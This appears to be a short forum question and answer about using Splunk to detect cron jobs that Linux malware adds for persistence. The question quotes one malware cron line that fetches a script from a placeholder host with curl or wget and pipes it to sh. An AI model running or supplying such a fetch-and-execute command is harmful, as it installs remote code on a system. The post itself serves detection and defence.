when some Trojans or virus are implanted in the Linux OS. it will add cron job to persist the Trojans .
curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx.com/raw/sByq0rym)|sh
so, can I use splunk to monitor newly added cron job ?
You can monitor crontab files and apply your logic to find new cron job added.
The below doc is helpful to find out cronjob location